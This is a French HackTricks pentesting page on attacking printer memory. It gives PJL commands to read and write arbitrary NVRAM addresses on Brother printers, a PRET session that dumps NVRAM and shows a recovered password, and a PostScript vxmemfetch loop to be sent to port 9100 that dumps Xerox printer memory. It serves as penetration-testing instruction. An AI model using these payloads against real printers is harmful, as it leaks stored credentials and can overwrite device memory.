hacktricks/network-services-pentesting/pentesting-printers/memory-access.md
2023-06-03 13:10:46 +00:00

4.9 KiB

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Vous pouvez essayer de vider la NVRAM et d'extraire des informations confidentielles (comme des mots de passe) à partir de là.

Dans PJL (Brother), vous pouvez accéder à des adresses NVRAM arbitraires en utilisant PJL comme indiqué ci-dessous:

@PJL RNVRAM ADDRESS = X              # read byte at location X
@PJL WNVRAM ADDRESS = X DATA = Y     # write byte Y to location X

Vous pouvez tester cette attaque en utilisant PRET :

./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................

Certains modèles d'imprimantes Xerox ont un opérateur PostScript propriétaire appelé vxmemfetch, qui permet à un attaquant de lire des adresses mémoire arbitraires. En utilisant une boucle PostScript, cette fonctionnalité peut être facilement utilisée pour vider toute la mémoire comme indiqué ci-dessous (PRET n'a pas cette attaque, vous devrez donc envoyer cette charge utile sur le port 9100 dans une connexion nc):

/counter 0 def 50000 {
  /counter counter 1 add def
  currentdict /RRCustomProcs /ProcSet findresource begin
  begin counter 1 false vxmemfetch end end == counter
} repeat

Plus d'informations ici: http://hacking-printers.net/wiki/index.php/Memory_access

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥